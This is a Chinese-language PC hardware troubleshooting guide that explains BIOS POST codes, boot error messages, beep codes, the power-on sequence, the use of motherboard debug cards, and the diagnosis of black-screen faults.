这一过程是逐一进行的,BIOS厂商对每一个设备都给出了一个检测代码(称为POST CODE即开机自我检测代码),在对某个设置进行检测时,首先将对应的POST CODE写入80H(地址)诊断端口,当该设备检测通过,则接着送另一个设置的POST CODE,对此设置进行测试。如果某个设备测试没有通过,则此POST CODE会在80H处保留下来,检测程序也会中止,并根据已定的报警声进行报警(BIOS厂商对报警声也分别作了定义,不同的设置出现故障,其报警声也是不同的,我们可以根据报警声的不同,分辨出故障所在。
POST自检是按什么顺序进行检测的?
POST自检测过程大致为:加电-CPU-ROM-BIOS-System Clock-DMA-64KB RAM-IRQ-显卡等。检测显卡以前的过程称过关键部件测试,如果关键部件有问题,计算机会处于挂起状态,习惯上称为核心故障。另一类故障称为非关键性故障,检测完显卡后,计算机将对64KB以上内存、I/O口、软硬盘驱动器、键盘、即插即用设备、CMOS设置等进行检测,并在屏幕上显示各种信息和出错报告。在正常情况下,POST过程进行得非常快,我们几乎无法感觉到这个过程。
POST自检测代码含义是什么?
当系统检测到相应的错误时,会以两种方式进行报告,即在屏幕上显示出错信息或以报警声响次数的方式来指出检测到的故障。
CMOS battery failed(CMOS 电池失效)。
原因:说明CMOS 电池的电力已经不足,请更换新的电池。
CMOS check sum error-Defaults loaded(CMOS 执行全部检查时发现错误,因此载入预设的系统设定值)。
原因:通常发生这种状况都是因为电池电力不足所造成,所以不妨先换个电池试试看。如果问题依然存在的话,那就说明 CMOS RAM 可能有问题,最好送回原厂处理。
Display switch is set incorrectly(显示开关配置错误)。
原因:较旧型的主板上有跳线可设定显示器为单色或彩色,而这个错误提示表示主板上的设定和 BIOS 里的设定不一致,重新设定即可。
Press ESC to skip memory test(内存检查,可按ESC键跳过)。
原因:如果在 BIOS 内并没有设定快速加电自检的话,那么开机就会执行内存的测试,如果你不想等待,可按 ESC 键跳过或到 BIOS 内开启 Quick Power On Self Test。
HARD DISK initializing【Please wait a moment...】(硬盘正在初始化 请等待片刻)。
原因:这种问题在较新的硬盘上根本看不到。但在较旧的硬盘上,其启动较慢,所以就会出现这个问题。
HARD DISK INSTALL FAILURE (硬盘安装失败)。
原因:硬盘的电源线、数据线可能未接好或者硬盘跳线不当出错误 ( 例如一根数据线上的两个硬盘都设为 Master 或 Slave。)
Secondary slave hard fail (检测从盘失败)。
原因:1 CMOS 设置不当(例如没有从盘但在CMOS里设有从盘) 2 硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当。
Hard disk(s) diagnosis fail (执行硬盘诊断时发生错误)。
原因:这通常代表硬盘本身的故障。你可以先把硬盘接到另一台电脑上试一下,如果问题一样,那只好送修了。
Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)(无法驱动软驱)。
原因:软驱的排线是否接错或松脱?电源线有没有接好?如果这些都没问题,那买个新的吧。
Keyboard error or no keyboard present(键盘错误或者未接键盘)
原因:键盘连接线是否插好?连接线是否损坏?
Memory test fail (内存检测失败)
原因:通常是因为内存不兼容或故障所导致。
Override enable-Defaults loaded ( 当前CMOS设定无法启动系统,载入 BIOS 预设值以启动系统)。
原因:可能是你在BIOS内的设定并不适合你的电脑( 像你的内存只能跑100MHz但你让它跑133MHz ),这时进入 BIOS 设定重新调整即可。
Press TAB to show POST screen (按 TAB 键 可以切换屏幕显示)
原因:有一些 OEM 厂商会以自己设计的显示画面来取代 BIOS 预设的开机显示画面,而此提示就是要告诉使用者可以按TAB来把厂商的自定义画面和BIOS预设的开机画面进行切换。
Resuming from disk,Press TAB to show POST screen(从硬盘恢复开机,按TAB显示开机自检画面)。
原因:某些主板的BIOS 提供了 Suspend to disk(挂起到硬盘)的功能,当使用者以 Suspend to disk 的方式来关机时,那么在下次开机时就会显示此提示消息。
BIOS ROM checksum error-System halted(BIOS 程序代码在进行总和检查 ( checksum ) 时发现错误,因此无法开机)
原因:遇到这种问题通常是因为 BIOS 程序代码更新不完全所造成的,解决办法重新刷写烧坏主板 BIOS。
HARD DISK initizlizing 【Please wait a moment...】(正在对硬盘做起始化 ( Initizlize ) 动作)
原因:这种讯息在较新的硬盘上根本看不到。但在较旧型的硬盘上,其动作因为较慢,所以就会看到这个讯息。
POST自检响铃次数是如何定义的?
POST上电自检还会通过报警声响次数的方式来指出检测到的故障。但需要注意:由于目前主板BIOS类型大致可分为AWARD公司、AMI公司、PHOENIX公司(AWARD已与PHOENIX合并),因此不同类型的BIOS,其自检响铃次数所定义的自检错误是不一致的,因此一定要分清。
POST自检发现错误后如何提示?
POST自检如发现有错误,将按两种情况处理:对于严重故障(致命性故障)则停机,此时由于各种初始化操作还没完成,不能给出任何提示或信号;对于非严重故障则给出提示或声音报警信号(以上介绍),等待用户处理。通过BIOS自检功能(POST自检),我们就可以方便的侦测出主板的故障所在,以便正确的解决。
如我们按下电源键后,只有电源指示灯亮,电脑屏幕没有任何反映,也没有报警声;那么针对这种情况,我们又应如何解决呢?
屏幕没有显示,也没有报警声,我们就无法从POST自检功能得到相应的信息;大家都知道,计算机是一个复杂而且精密的产品组合,因此一个环节出现问题,可能都无法启动机器(我们主要谈硬件方面)。因此,如出现黑屏,无报警声响的故障现象,我们就应根据电脑的启动过程来分析问题所在了。
电脑的启动过程是什么?
我们在按下启动键时,首先启动的应是电源(因为如果没有电源供电,那么主板上所有的配件都是无法工作的)。但是为了保证安全使用,电源部分采取了一系列安全保护措施;因此开关电源从起振到稳定之间会有一段时间的延迟,等待各组电压都稳定下来后,电源各部分会输出一个检测信号,这个信号为高电平时表示该部分电压正常,这些部分包括输入电压和各组输出电压。这些信号总和的结果就是一个POWER GOOD信号(也称为POWER OK或PWR OK信号);如果主板接受不到这个信号,那么时钟芯片会持续向CPU发送复位(RESET)信号(与我们按下RESER键相当),CPU就不会工作。
当CPU接受到正常的POWER GOOD信号,主板和CPU就启动了吗?其实主板此时,还要根据CPU的VID0-VID3引脚的定义组合,将CPU所提供的VID0-VID3信号送到电源管理模块的相应的端口;如果主板BIOS具有可设定CPU电压的功能,主板会按时设定的电压与VID的对应关系产生新的VID信号并送到电源管理模块芯片,电源管理模块将根据设定并通过DAC电压将其转换为基准电压,再经过场效应管轮流导通和关闭,将能量通过电感线圈送到CPU,最后再经过调节电路使用输出电压与设定电压值相当。
由于CPU还要根据自己所需要的频率,通过IC总线来检测主板频率发生器所设置的频率是否支持;因为电脑要进行正确的数据传送以及正常的运行,没有时钟信号是不行的,时钟信号在电路中的主要作用就是同步;因为在数据传送过程中,对时序都有着严格的要求,只有这样才能保证数据在传输过程不出差错。时钟信号首先设定了一个基准,我们可以用它来确定其它信号的宽度,另外时钟信号能够保证收发数据双方的同步。对于CPU而言,时钟信号作为基准,CPU内部的所有信号处理都要以它作为标尺,这样它就确定CPU指令的执行速度;如CPU本身的频率无法适应频率发生器所提供的高频率,也是无法正常工作的。因此只有当接受到POWER GOOD信号,和相应的得到CPU工作的电压时以及相应的时钟频率后,CPU才能正常的工作,也就是开始执行BIOS程序。
如何判断、解决故障所在?
因为如接受不到POWER GOOD信号,系统就一直处理RESET(复位)循环中,因此主板也就无法启动,相应的其它硬件,如显卡也无法工作,显示器由于接受不到显卡传出的信号,因此也就没有显示,一直处于待机状态。此时,我们应检测电源,不要以为电源灯亮,就表明电正常,因为只要有一路信号有故障(该部分电路不正常或还未稳定),输入出的POWER GOOD信号都为低电平,即表示电源部分有故障或还未进入稳定状状;虽然电源指示灯亮,但由于主板接受不到正常的POWER GOOD信号,也无法启动。我们检测电源的方法是,使用可正常工作的电源测试。如电源为ATX型我们可用导线将13与14脚短接,如电源风扇能正常运行,则表明电源是完好的,则故障应在主板上。
更换正常电源后,如系统还是没有工作的显象,应按以上主板启动过程,测试CPU的电源管理模块和频率发生器。但由于我们不可能有完善的设备来测试主板上的电源和频率模块(大多数电脑爱好者不可能有此类设置,和具有相应的检测能力)。因此我们对此还要采用排除法,即在其它正常主板上测试CPU。测试排除CPU的故障外,还应检测主板频率设置问题。电脑爱好者为使用或测试CPU的超频能力,会通过调整主板外频的方式(目前CPU已经锁频,只能设置外频,而无法设置倍频),来调高CPU的工作频率。如果CPU无法适应高工作频率,虽然电源供电正常,主板也是无法启动的。
排除了其它硬件的问题,为会么系统仍不可启动?
如果硬件一切正常(经测试),那么在POST上电自检测后,CPU会从地址FFFF0H处开始执行指令,这个地址在系统BIOS的地址范围内,无论是Award BIOS还是AMI BIOS,放在这里的只是一条跳转指令,跳到系统BIOS中真正的启动代码处。由于BIOS是连接操作系统和硬件之间的桥梁,为计算机提供最低级的、最直接的硬件控制,计算机的原始操作都是依照固化在BIOS里的内容(指令)来完成的。因此如BIOS文件破坏或BIOS芯片损坏,都会直接的影响主板的启动。
如何判断BIOS已经损坏?
判断BIOS是否正常比较困难,因为如没有编程器等测试工具;是无法通过感官来判断BIOS文件或芯片是否正常的,对于普通用户而言,只有寻找维修商来解决了。
如果屏幕显示BIOS ROM checksum error-System halted(BIOS 程序代码在进行总和检查 ( checksum ) 时发现错误)的提示时,应是读取BIOS时,校验总和出错,因此无法启机器。这种问题通常是因为 BIOS 程序代码更新不完全所造成的,解决办法重新刷写烧坏主板 BIOS。
什么是BIOS checksum校验总和?
Checksum(校验总和)是在数据处理和数据通信领域中一个简单易行的完整性控制方法。通过一系列算术或逻辑操作将数据的所有字节组合起来,得到一个校验和值。以后可以通过相同的方法计算出校验和值并与上次计算出的值进行比较。若相等,说明数据没有改变;若不等,说明数据已经被修改了。
其它使系统无法启动的原因?
通常情况下在调入BIOS后,对电脑开启时的检测、初始化系统设备、装入操作系统并调度操作系统向硬件发出的指令都是由BIOS来完成的,而且一些硬件检测也可通过POST自检来显示工作是否正常,是否一些开机前的问题都可解决了。其实不然,因为在CPU调入BIOS后,但还需要检测640K基本内存以及各插槽的中断;虽然如内存错误POST可以通过报警声来提示我们,但如内存内部损坏或短路,会造成主板局部短路,还是不能启动机器的;因此对于系统无显示、无报警声的处理,除了基本上排除方式外,还需要平时的经验积累。
由于超频,机器无法启动,应如何解决?
对于超频无法启动机器,清除频率设置有两种方式;一种是清除CMOS设置(针对可在CMOS中设置CPU工作频率的方式);只要在主板上找到CMOS清除跳线(一般情况下在主板电池旁边,为一三针跳线),将CMOS清除后,重新恢复跳线位置,即可解决。另外一种方式是重新设置频率设置跳线(针对通过主板频率跳线设置CPU频率的方式),只要按说明书重新设置正常的频率即可。
主板侦错卡是一种什么检测工具?
主板侦错卡是一种专业硬件故障检测设备,利用其自身的硬件电路读取80H地址内的POST CODE,并经译码器译码,最后由数码LED指示灯将代码一一显示出来,其原理与POST自检是一致。这样就可以通过DEBUG卡上显示的16进制代码判断问题出在硬件的那一部分,而不用仅依靠计算机主板那几声单调的警告声来粗略判断硬件错误了。而且由于侦错卡是利用自身的BIOS POST程序,来读取诊断端口的POST代码,因此不受主板BIOS芯片限制,可以在主板BIOS损坏的情况下,正常诊断;并且利用侦错卡自身的发光二级管,来显示各组电压工作状态。通过它可知道硬件检测没有通过的是内存还是CPU,或者是其他硬件,方便直观地解决棘手的主板问题。
目前的主板侦错卡通常带有ISA和PCI两种接口,可以方便的使用在任何一种主板,而且插反后不会烧毁主板或侦错卡(非常适合于初级用户);卡上有两位数字LDE提示灯;倘若电脑无法启动时将其插入故障主板的相应插槽中,接通电源后,根据LED指示灯最后停滞的数字,参照随卡附带的故障列表手册,就能知道主板故障所在。而且最新的侦错卡,可以通过侦错卡的主板运行检测灯,方便的检测出是主板本身的故障,还是主板上其它硬件的故障。
如何使用主板侦错卡?
首先把DEBUG卡插到故障主板上,CPU、内存、扩充卡都不插,只插上主板的电源,此时,主振灯应亮,否则主板不起振;复位信号灯应亮半秒种后熄灭,若不亮,则主板无复位信号而不能用,如果常亮,则主板总处于复位状态,无法向下进行,初学者常把加速开关线当成复位线插到了复位插针上,导致复位灯常亮,复位电路损坏也会导致此故障;分频信号灯应亮,否则说明分频部分有故障;+5V、-5V、+12V、-12V(新式卡多了+3V、-3V)四个(六个)电源指示灯应足够亮,不亮或亮度不够,说明开关电源输出不正常,或者是主板对电源短路或开路;BIOS信号灯因无CPU不亮是正常的,但若插上完好的CPU后,BIOS灯应无规则的闪亮,否则说明CPU坏或跳线不正确或主板损坏。DEBUG 2000的这一功能相当有效,象-5V、-12V的电压值在PC组件中极少用到,新攒的或使用已久的PC电源,其-5V和-12V可能已经损坏,平时虽相安无事,出了问题却会让你头疼,现在,通过DEBUG卡上的批示灯就可方便地解决这个问题。排除了以上简单的故障后,把有关的扩展卡插上(一般是只组成最小系统),根据开机后显示的代码,就可以直接找到有问题的配件,从而方便地解决装机时出现的硬件错误,比如内存、显卡、CPU等硬件的接触错误,BIOS,CPU缓存的功能错误等。
我的新主板为何找不到IDE设置,应如何解决?
这是由于当前的硬盘的容量和速度不断提升,无论功耗还是对供电电流的要求都大大的增加了,而且硬盘从关机(POWER OFF)到启动(POWER ON)到初始化完成,需要的时间也增加了,但是主板BIOS执行时从开机到检测到IDE设备的时间并没有增加,这便导致了主板无法检测到硬盘或因为检测硬盘耗时太长而延迟了检测其它IDE设备的时间,特别是在连接有两块或更多的硬盘系统上,这种问题更加明显,此时倘若按下RESET 复位键,由由于各IDE设备均已经完成初始化工作,因此该故障不再出现。 对此,只要开机时进入CMOS SETUP界面,找到“Boot Delay Time”选项(注:有些厂商的BIOS为“IDE Delay Time”),将其延迟时间适当延长即可。对于没有此选项的主板BIOS,也可以在CMOS SETUP选项中将内存自检次数设为三次并开启Flooy Seek,增加IDE初始化时间。
电脑经常重启,而且多发生在读盘的时候,与BIOS有关吗?
应与BIOS设置无关的,这主要是由于电源功率不足,造成电压波动而引起的;因为一些质量较差的电源在空载时电压正常,但由于电源不足,一加负载(读取硬盘时,需要很大的工作电流),电压即会下降,因而引起重启。更换一个高质量、大功率电源即可解决。
为什么显示“Dimm 3&4 Conflict.Turn off power and remove DIMM 4”提示?
一般是在升级内存后出现这种提示的,主要是由于主板的第3和第4内存插槽共享BANK的缘故。对于这种情况,只有更换内存条(单面内存条)才可解决。
黑屏故障
计算机显示器出现黑屏是用户在使用计算机中经常遇到的问题。由于它的成因较为复杂,有可能涉及到计算机硬件中主板、CPU内存、显示卡、显示器等几大部件,故许多人对其故障出现后该如何解决颇有束手无策之感。下面我将结合自己对显示器黑屏故障处理的一些经验来谈谈对这类故障的分析与处理方法。
显示器黑屏故障按其故障成因可分为由电脑硬件故障引起的黑屏故障和电脑软件故障引起的黑屏故障两大类。其中电脑硬件故障引起的黑屏故障较为常见,而电脑软件故障引起的黑屏故障不易见,且对初学者而言较显繁琐、较为专业。下面我们就分别对其进行论述。
一、电脑硬件故障引起的黑屏故障
由电脑硬件故障引起的黑屏故障又可分为以下两大类:
一、电脑主机故障引起的黑屏故障
1、主机电源引起的故障
主机电源损坏或主机电源质量不好引起的黑屏故障很常见。例如,当添加了一些新设备之后,显示器便出现了黑屏故障,排除了硬件质量及兼容性问题之后电源的质量不好动力不足是故障的主要起因,更换大动率质优电源或使用稳压电源是解决这类故障的最好办法。
2、配件质量引起的故障
电脑配件质量不佳或损坏,是引起显示器黑屏故障的主要成因。如内存,显示卡,主板、CPU等出现问题肯定可能引起黑屏故障的出现。其故障表现为显示器灯呈橘黄色,此时可用替换法更换下显示卡,内存、CPU,主板等部件试试,这是最简便、快捷的解决办法。
3、配件间的连接质量
内存,显示卡等与主板间的插接不正确或有松动,灰尘等造成接触不良是引发黑屏故障的主要原因。而且显示卡与显示器连接有问题,或驱动器的数据线接反也可能引发黑屏故障。
4、超频引起的黑屏故障
过度超频或给不适合于超频的部件进行超频不仅会造成黑屏故障的产生,严重时还会引起配件的损坏。若过度超频或给不适合于超频的部件超频后散热不良或平常使用中因风扇损坏导致无法给CPU散热等等都会造成系统自我保护死机黑屏。
二、显示器自身故障引起的黑屏故障
1、交流电源功率不足
外部电源功率不足,造成一些老显示器或一些耗电功率大的显示器不能正常启动,是显示器自身故障引起的黑屏故障原因之一。或者外部电源电压不稳定,电压过高过低都可能造成显示器工作不稳定、甚至不工作。
2、电源电路故障
显示器的开关电路以及其他电路出现故障是引起显示器黑屏故障的主要成因。如保险丝熔断,整流桥开关管被击穿,限流保护电阻烧断等故障导致显示器无法工作。
3、 显像管、行输出电路的损坏
显像管或行输出电路出现故障也会引发显示器加电无光栅黑屏的故障,也是引起显示器黑屏故障的主要成因。
二、电脑软件故障引起的黑屏故障
如软件冲突,驱动程序安装不当,BIOS刷新出错,CMOS设置不正确等都可引起黑屏故障。此外,如恶性病毒引起硬件损坏(如CIH)等等都有可能引起显示器黑屏故障的出现。 到这类故障时若能多考虑一下故障的成因,做到解决故障知已知彼事半功倍。
三、显示器黑屏故障解决思路
1、检查主机电源,工作是否正常。首先,通过杳看主机机箱面板电源指示灯是否亮,及电源风扇是否转动来确定主机系统有没有得到电源供应。其次,用万用表检查外部电压是否符合要求,电压过高或过低都可能引起主机电源发生过压或欠压电路的自动停机保护。另外,重点检查电源开关及复位键的质量以及它们与主板上的连线的正确与否都有很重要,因为许多劣质机箱上的电源开关及复位键经常发生使用几次后便损坏,造成整机黑屏无任显示。若电源损坏,则更换电源便可解决。
2、检查显示器电源是否接好。显示器加电时有“嚓”的一声响,且显示器的电源指示灯亮,用户移动到显示器屏幕时有“咝咝”声,手背汗毛竖起。
3、检查显示器信号线与显示卡接触是否良好。若接口处有大量污垢,断针及其它损坏均会导致接触不良,显示器黑屏。
4、检查显示卡与主板接触是否良好。若显示器黑屏且主机内喇叭发出一长二短的蜂鸣声,则表明显示卡与主板间的连接有问题,或显示卡与显示器这间的连接有问题,可重点检查其插槽接触是否良好槽内是否有异物,将显示卡换一个主板插槽进行测试,以此判断是否插槽有问题。
5、检查显示卡是否能正常工作。查看显示卡上的芯片是否能烧焦,开裂的痕迹以及显示卡上的散热风扇是否工作,散热性能是否良好。换一块工作正常的显示卡,用以排除是否为显示卡损坏。
6、检查内存条与主板的接触是否良好,内存条的质量是否过硬。如果计算机启动时黑屏且主机发出连续的蜂鸣声,则多半表明内存条有问题,可重点检查内存和内存槽的安装接触情况,把内存条重新拔插一次,或者更换新的内存条。
7、检查机箱内风扇是否转动。若机箱内散热风扇损坏,则会造成散热不良,严重者会造成CPU及其它部件损坏或电脑自动停机保护,并发出报警声。
8、检查其他的板卡(如声卡、解压卡、视频、捕捉卡)与主板的插槽是否良好以及驱动器信号线连接是否正确。这一点许多人往往容易忽视。一般认为,计算机黑屏是显示器部分出问题,与其他设备无关。实际上,因声卡等设备的安装不正确,导致系统初始化难以完成,特别是硬盘的数据线接口,也容易造成无显示的故障。
9、检查CPU是否超频使用,CPU与主板的接触是否良好,CPU散热风扇是否完好。若超频使用导致黑屏,则把CPU跳回原频率就可以了。若接触不良,则取下CPU须重新安装,并使用质优大功率风扇给CPU散热。
10、检查参数设置。检查CMOS参数设置是否正确,若CMOS参数设置不当而引起黑屏,计算机不启动,则须打开机箱,动手恢复CMOS默认设置。
11、检查是否为病毒引发显示器黑屏。若是因病毒造成显示器黑屏,此时可用最新版杀毒软件进行处理,有时需重写BIOS程序。
12、若是显示器内部电路故障导致黑屏或显像管损坏,则应请专业人员维修。